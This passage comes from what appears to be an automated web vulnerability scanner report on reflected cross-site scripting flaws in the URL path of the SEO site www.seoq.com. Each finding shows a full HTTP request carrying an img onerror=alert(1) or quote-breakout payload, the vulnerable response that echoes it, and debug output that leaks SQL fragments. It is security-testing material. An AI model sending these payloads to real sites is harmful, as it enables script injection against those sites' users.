GET /quotient/2011/04/22/2271/Ne219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271/Ne219d"><img src=a onerror=alert(1)>386ed1751a4" title="SEO Quotient for ">
...[SNIP]...
7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fd7'%3b0c772ed9b7b was submitted in the REST URL parameter 5. This input was echoed as 14fd7';0c772ed9b7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/227214fd7'%3b0c772ed9b7b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/227214fd7';0c772ed9b7b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc was submitted in the REST URL parameter 5. This input was echoed as 11e62"><img src=a onerror=alert(1)>ec3b20cb8bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/227211e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/227211e62"><img src=a onerror=alert(1)>ec3b20cb8bc/N" title="SEO Quotient for ">
...[SNIP]...
7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e was submitted in the REST URL parameter 5. This input was echoed as 7afe1<img src=a onerror=alert(1)>6a57730655e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22727afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22727afe1<img src=a onerror=alert(1)>6a57730655e and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19a08'%3b280f9175559 was submitted in the REST URL parameter 6. This input was echoed as 19a08';280f9175559 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2272/N19a08'%3b280f9175559 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2272/N19a08';280f9175559';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d was submitted in the REST URL parameter 6. This input was echoed as 1874b<img src=a onerror=alert(1)>838bfb09b7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/N1874b<img%20src%3da%20onerror%3dalert(1)>838bfb09b7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:22 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>838bfb09b7d" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2272/N1874b<img src=a onerror=alert(1)>838bfb09b7dddd</a>
...[SNIP]...
7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 was submitted in the REST URL parameter 6. This input was echoed as b9011"><img src=a onerror=alert(1)>7829e282ab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2272/Nb9011"><img%20src%3da%20onerror%3dalert(1)>7829e282ab5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:18 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2272/Nb9011"><img src=a onerror=alert(1)>7829e282ab5" title="SEO Quotient for ">
...[SNIP]...
7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad3ad'%3b463e9885ca0 was submitted in the REST URL parameter 5. This input was echoed as ad3ad';463e9885ca0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837ad3ad'%3b463e9885ca0/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837ad3ad';463e9885ca0/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31 was submitted in the REST URL parameter 5. This input was echoed as a2f78"><img src=a onerror=alert(1)>bb9cb173e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837a2f78"><img%20src%3da%20onerror%3dalert(1)>bb9cb173e31/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837a2f78"><img src=a onerror=alert(1)>bb9cb173e31/N" title="SEO Quotient for ">
...[SNIP]...
7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d was submitted in the REST URL parameter 5. This input was echoed as e4fbb<img src=a onerror=alert(1)>4613103a22d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837e4fbb<img%20src%3da%20onerror%3dalert(1)>4613103a22d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2837e4fbb<img src=a onerror=alert(1)>4613103a22d and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc was submitted in the REST URL parameter 6. This input was echoed as 27b60<img src=a onerror=alert(1)>ef64cfd30bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N27b60<img%20src%3da%20onerror%3dalert(1)>ef64cfd30bc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>ef64cfd30bc" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2837/N27b60<img src=a onerror=alert(1)>ef64cfd30bcddd</a>
...[SNIP]...
7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 was submitted in the REST URL parameter 6. This input was echoed as 17a92"><img src=a onerror=alert(1)>de0a2e8b0b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2837/N17a92"><img%20src%3da%20onerror%3dalert(1)>de0a2e8b0b4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:12 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:12 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2837/N17a92"><img src=a onerror=alert(1)>de0a2e8b0b4" title="SEO Quotient for ">
...[SNIP]...
7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3919e'%3bac9e2d2d60d was submitted in the REST URL parameter 6. This input was echoed as 3919e';ac9e2d2d60d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2837/N3919e'%3bac9e2d2d60d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:13 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837/N3919e';ac9e2d2d60d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88 was submitted in the REST URL parameter 5. This input was echoed as e2d53<img src=a onerror=alert(1)>004fea5ea88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838e2d53<img%20src%3da%20onerror%3dalert(1)>004fea5ea88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2838e2d53<img src=a onerror=alert(1)>004fea5ea88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf was submitted in the REST URL parameter 5. This input was echoed as b22fb"><img src=a onerror=alert(1)>a2def4fbbbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2838b22fb"><img%20src%3da%20onerror%3dalert(1)>a2def4fbbbf/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2838b22fb"><img src=a onerror=alert(1)>a2def4fbbbf/N" title="SEO Quotient for ">
...[SNIP]...
7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2955f'%3b8adf3a8c684 was submitted in the REST URL parameter 5. This input was echoed as 2955f';8adf3a8c684 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/28382955f'%3b8adf3a8c684/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
